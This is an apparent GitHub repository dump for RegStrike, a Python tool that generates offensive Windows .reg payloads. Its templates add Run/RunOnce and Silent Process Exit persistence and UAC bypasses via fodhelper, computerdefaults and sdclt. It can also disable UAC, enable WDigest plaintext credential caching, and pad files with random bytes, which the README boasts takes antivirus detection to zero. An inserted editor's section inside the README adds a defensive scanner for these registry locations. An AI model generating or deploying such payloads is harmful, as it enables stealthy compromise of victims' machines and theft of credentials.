├── LICENSE
├── README.md
├── RegStrike
│   └── RegStrike.py
└── assets
    ├── not_obf.PNG
    ├── not_obf_vt.PNG
    ├── obf.PNG
    ├── obf_vt.PNG
    └── ui.PNG

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2022 Itay Migdal

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------

# Regstrike

*RegStrike is a .reg payload generator.*

![](/assets/ui.PNG)

It's simple, intuitive, lightweight, and dependency-free.

The main purpose of the .reg payloads is to add persistence using various techniques (including combinations with UAC bypass techniques).
It is also capable of messing with some other registry settings.

Although .reg files are basically text files, it turns out that adding binary data to one won't break it: the .reg file will still be parsed correctly. This lets you pad the .reg file with tons of gibberish and make users believe the file is unreadable binary. Just tell RegStrike how much obfuscation to add and it's got you covered.

One of the main reasons to use .reg as a payload is its very low detection rate by AV products, and obfuscation apparently lowers it even further.

For example, here is a .reg payload that uses the [Silent Process Exit](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) technique for persistence:

![](/assets/not_obf.PNG)

And its very low detection on VT:

![](/assets/not_obf_vt.PNG)

Adding 3 MB of binary obfuscation:

![](/assets/obf.PNG)

will bring it down to zero :smiling_imp:

![](/assets/obf_vt.PNG)

RegStrike is easily extendable for more persistence methods / registry values that an attacker would want to add.
Feel free to open PRs and issues, or contact me via ([Gmail](itaymigdal9@gmail.com) | [Linkedin](https://www.linkedin.com/in/itay-migdal-b91821116/) | [Twitter](https://twitter.com/0xTheBruter)).
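As an added example from the editor (not code from the RegStrike project), here is the defender-side counterpart to the padding trick described above and to the `add_obfuscation` routine in `RegStrike.py`: a triage scanner that reads a padded .reg file as bytes, keeps only the lines a registry editor would still treat as keys and values, and flags the registry locations that this project's templates write (Run/RunOnce, IFEO GlobalFlag, SilentProcessExit, the `shell\open\command` handlers, EnableLUA and WDigest UseLogonCredential). The names `parse_reg`, `classify`, `scan`, `binary_ratio`, `JUNK` and `build_sample` are the editor's own; the sample file is constructed inline with placeholder commands, and the junk bytes are a deterministic stand-in for the tool's `urandom()` output.

```python
"""Triage scanner for .reg files padded with binary junk.

Editor's added example, not part of RegStrike. It never touches the registry:
it walks a .reg file as bytes, drops junk lines, and flags the locations the
page's templates write. Assumes the 8-bit encoding RegStrike emits; a regedit
export is UTF-16LE and would need decoding first.
"""
import re

# [HIVE\path] headers and "name"=data lines (the default value may be written @=data)
KEY_RE = re.compile(rb'^\[(HKEY_[A-Z_]+(?:\\[^\]\r\n]*)?)\]$', re.IGNORECASE)
VALUE_RE = re.compile(rb'^(?P<name>"(?:[^"\\]|\\.)*"|@)=(?P<data>.*)$')
# A junk block can by chance start with a quote and look like a value line, so
# only lines that are entirely printable ASCII are considered at all.
PRINTABLE = re.compile(rb'^[\x20-\x7e]*$')


def parse_reg(blob):
    """Return [(key, name, data)] for every value line; junk lines never pass
    the printable check, so they are skipped instead of breaking the parse."""
    entries = []
    current_key = None
    for raw in blob.split(b"\n"):
        line = raw.rstrip(b"\r")
        if not PRINTABLE.match(line):
            continue
        m = KEY_RE.match(line)
        if m:
            current_key = m.group(1).decode("ascii")
            continue
        m = VALUE_RE.match(line)
        if m and current_key is not None:
            name = m.group("name").decode("ascii").strip('"')
            entries.append((current_key, name, m.group("data").decode("ascii")))
    return entries


def classify(key, name, data):
    """Map one registry write to a label (editor's own naming), or None."""
    k, n, d = key.lower(), name.lower(), data.lower()
    if re.search(r"\\currentversion\\run(once)?$", k):
        return "autorun-entry"
    if "image file execution options\\" in k and n == "globalflag" and d == "dword:00000200":
        return "ifeo-silent-process-exit-flag"
    if "\\silentprocessexit\\" in k and n == "monitorprocess":
        return "silent-process-exit-monitor"
    if k.endswith("\\shell\\open\\command") and ("\\classes\\ms-settings\\" in k or "\\classes\\folder\\" in k):
        return "protocol-handler-command"
    if k.endswith("\\policies\\system") and n == "enablelua" and d == "dword:00000000":
        return "uac-disabled"
    if k.endswith("\\securityproviders\\wdigest") and n == "uselogoncredential" and d == "dword:00000001":
        return "wdigest-plaintext-credentials"
    return None


def scan(blob):
    """Return [(label, key, name, data)] for the watched locations found in blob."""
    findings = []
    for key, name, data in parse_reg(blob):
        label = classify(key, name, data)
        if label:
            findings.append((label, key, name, data))
    return findings


def binary_ratio(blob):
    """Share of bytes that are neither printable ASCII nor whitespace; a .reg
    file is supposed to be text, so a high ratio is itself a signal."""
    if not blob:
        return 0.0
    junk = sum(1 for b in blob if not (0x20 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D)))
    return junk / len(blob)


# Constructed stand-in for the random bytes the tool splices in: 512 non-ASCII bytes.
JUNK = bytes(range(0x80, 0x100)) * 4


def build_sample(junk=JUNK):
    """Constructed sample in the layout RegStrike writes: header, then sections
    separated by blank lines with junk spliced between them. Paths are placeholders."""
    sections = [
        b'[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\n'
        b'"GoogleUpdate"="C:\\\\Example\\\\placeholder.exe"',
        b'[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe]\n'
        b'"GlobalFlag"=dword:00000200',
        b'[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe]\n'
        b'"ReportingMode"=dword:00000001\n'
        b'"MonitorProcess"="C:\\\\Example\\\\placeholder.exe"',
        b'[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]\n'
        b'"EnableLUA"=dword:00000000',
    ]
    blob = b"Windows Registry Editor Version 5.00\n"
    for section in sections:
        blob += b"\n" + junk + b"\n" + section
    return blob + b"\n" + junk + b"\n"


if __name__ == "__main__":
    sample = build_sample()
    print(f"binary ratio: {binary_ratio(sample):.2f}")
    for finding in scan(sample):
        print(finding)
```

Two design points matter in practice. First, the scanner works on bytes and whitelists printable lines rather than decoding the whole file, because random padding will contain newlines and quote characters and can otherwise produce phantom value lines; a padded file and its unpadded original therefore yield the same findings. Second, `binary_ratio` is a cheap file-level signal that needs no rules at all: a file with a `.reg` extension and a text header whose bytes are overwhelmingly non-printable is already worth a look, whatever the keys inside it turn out to be.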

--------------------------------------------------------------------------------

/RegStrike/RegStrike.py:
--------------------------------------------------------------------------------
from os import urandom

regstrike_banner = r"""
 ___          ___ _       _ _
| _ \___ __ _/ __| |_ _ _(_) |_____
|   / -_) _` \__ \  _| '_| | / / -_)
|_|_\___\__, |___/\__|_| |_|_\_\___|
        |___/

>> Create offensive .reg payloads easy peasy :)
   https://github.com/itaymigdal/RegStrike
   By Itay Migdal
"""
reg_filename = "hi.reg"
payload_prefix = "Windows Registry Editor Version 5.00\n"
payload = payload_prefix
template_run = r"""
[{}\Software\Microsoft\Windows\CurrentVersion\{}]
"{}"="{}"
"""
template_spe = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\{0}]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\{0}]
"ReportingMode"=dword:00000001
"MonitorProcess"="{1}"
"""
template_bypass_uac = r"""
[HKEY_CURRENT_USER\software\classes\{}\shell\open\command]
"DelegateExecute"=""
""="{}"
"""
template_disable_uac = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
"""
template_wdigest = r"""
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest]
"UseLogonCredential"=dword:00000001
"""


def sanitize_command(command):
    # Escape double quotes so the command survives as a single .reg string value
    bad_chars = {
        '"': r'\"'
    }
    for c in bad_chars:
        command = command.replace(c, bad_chars[c])
    return command


def add_run():
    global payload
    while True:
        print("[>] Choose hive and key:")
        print("[1] HKCU, Run")
        print("[2] HKCU, RunOnce")
        print("[3] HKLM, Run (requires admin)")
        print("[4] HKLM, RunOnce (requires admin)")
        print("[99] Back")
        i = int(input(">> "))
        if i == 1:
            run_hive = "HKEY_CURRENT_USER"
            run_key = "Run"
        elif i == 2:
            run_hive = "HKEY_CURRENT_USER"
            run_key = "RunOnce"
        elif i == 3:
            run_hive = "HKEY_LOCAL_MACHINE"
            run_key = "Run"
        elif i == 4:
            run_hive = "HKEY_LOCAL_MACHINE"
            run_key = "RunOnce"
        elif i == 99:
            return
        else:
            print("[-] No such option :(")
            continue
        print("[>] Enter key data name (e.g. GoogleUpdate):")
        data_name = input(">> ")
        print(r"[>] Enter the command to execute (e.g. 'pOwErShElL -enc aQBlAHgAIA...')")
        command = sanitize_command(input(">> "))

        payload += template_run.format(run_hive, run_key, data_name, command)
        print("[+] Added")
        return


def add_uac_run():
    global payload
    while True:
        print("[>] Choose key:")
        print("[1] Run")
        print("[2] RunOnce")
        print("[99] Back")
        i = int(input(">> "))
        if i == 1:
            run_key = "Run"
        elif i == 2:
            run_key = "RunOnce"
        elif i == 99:
            return
        else:
            print("[-] No such option :(")
            continue
        print("[>] Choose UAC Bypass method:")
        print("[1] Fodhelper")
        print("[2] ComputerDefaults")
        print("[3] Sdclt")
        print("[99] Back")
        i = int(input(">> "))
        if i == 1:
            reg_class = "ms-settings"
            uac_binary = "fodhelper.exe"
        elif i == 2:
            reg_class = "ms-settings"
            uac_binary = "computerdefaults.exe"
        elif i == 3:
            reg_class = "folder"
            uac_binary = "sdclt.exe"
        elif i == 99:
            return
        else:
            print("[-] No such option :(")
            continue
        print("[>] Enter key data name (e.g. GoogleUpdate):")
        data_name = input(">> ")
        print(r"[>] Enter the command to execute (e.g. 'pOwErShElL -enc aQBlAHgAIA...')")
        command = sanitize_command(input(">> "))
        payload += template_bypass_uac.format(reg_class, command)
        payload += template_run.format("HKEY_CURRENT_USER", run_key, data_name, uac_binary)
        print("[+] Added")
        return


def add_spe():
    global payload
    print("[>] Enter the process name that when exits will trigger the command (e.g. notepad.exe)")
    process_name = input(">> ")
    print(r"[>] Enter the command to execute (e.g. 'pOwErShElL -enc aQBlAHgAIA...')")
    command = sanitize_command(input(">> "))
    payload += template_spe.format(process_name, command)
    print("[+] Added")


def add_persistence():
    print("[>] Choose:")
    print("[1] Add persistence using a Run/RunOnce key")
    print("[2] Add persistence using a Run/RunOnce key and UAC bypass")
    print("[3] Add persistence using Silent Process Exit technique (requires admin)")
    print("[99] Back")
    i = int(input(">> "))
    if i == 1:
        add_run()
    elif i == 2:
        add_uac_run()
    elif i == 3:
        add_spe()
    elif i == 99:
        return
    else:
        print("[-] No such option :(")


def mess_with_registry():
    global payload
    while True:
        print("[>] Choose:")
        print("[1] Disable UAC (requires admin)")
        print("[2] Enable plaintext credentials in memory via wdigest (requires admin)")
        print("[99] Back")
        i = int(input(">> "))
        if i == 1:
            payload += template_disable_uac
        # elif, not if: otherwise option [1] falls through to the [2]/[99] checks,
        # prints "No such option" and loops instead of reporting the addition
        elif i == 2:
            payload += template_wdigest
        elif i == 99:
            return
        else:
            print("[-] No such option :(")
            continue
        print("[+] Added")
        return


def add_obfuscation(obf_length):
    # Spread obf_length random bytes evenly over the blank lines between sections;
    # value lines get a leading newline so they stay separate from their key line
    global payload
    obfuscated_payload = b""
    splited_payload = payload.split("\n")
    obf_len_per_line = int(obf_length / splited_payload.count(""))

    for splited in splited_payload:
        if splited == "":
            obfuscated_payload += (b"\n" + urandom(obf_len_per_line) + b"\n")
        else:
            if splited.startswith('"'):
                splited = "\n" + splited
            obfuscated_payload += splited.encode()
    return obfuscated_payload


def print_payload():
    print(payload)


def reset_payload():
    global payload
    payload = payload_prefix
    print("[+] Payload reset")


def save_payload():
    global reg_filename
    print("[>] How many KB of obfuscation to add (0 for none)")
    obf_length = int(input(">> ")) * 1024
    obf_payload = add_obfuscation(obf_length)
    print(f"[>] Enter output file: (ENTER for default: {reg_filename})")
    alt_filename = input(">> ")
    if alt_filename != "":
        reg_filename = alt_filename
    with open(reg_filename, "wb") as f:
        f.write(obf_payload)
    print(f"[+] Payload saved as {reg_filename}")


def main_screen():
    while True:
        print("[>] Choose:")
        print("[1] Add persistence")
        print("[2] Mess with registry settings")
        print("[3] Print payload")
        print("[4] Reset payload")
        print("[5] Save payload")
        print("[99] Exit")
        i = int(input(">> "))
        if i == 1:
            add_persistence()
        elif i == 2:
            mess_with_registry()
        elif i == 3:
            print_payload()
        elif i == 4:
            reset_payload()
        elif i == 5:
            save_payload()
        elif i == 99:
            return
        else:
            print("[-] No such option :(")


if __name__ == '__main__':
    print(regstrike_banner)
    main_screen()
--------------------------------------------------------------------------------

/assets/not_obf.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/itaymigdal/RegStrike/77a779aa340863a64e33deaae765d8ded7ba98da/assets/not_obf.PNG
--------------------------------------------------------------------------------

/assets/not_obf_vt.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/itaymigdal/RegStrike/77a779aa340863a64e33deaae765d8ded7ba98da/assets/not_obf_vt.PNG
--------------------------------------------------------------------------------

/assets/obf.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/itaymigdal/RegStrike/77a779aa340863a64e33deaae765d8ded7ba98da/assets/obf.PNG
--------------------------------------------------------------------------------

/assets/obf_vt.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/itaymigdal/RegStrike/77a779aa340863a64e33deaae765d8ded7ba98da/assets/obf_vt.PNG
--------------------------------------------------------------------------------

/assets/ui.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/itaymigdal/RegStrike/77a779aa340863a64e33deaae765d8ded7ba98da/assets/ui.PNG
--------------------------------------------------------------------------------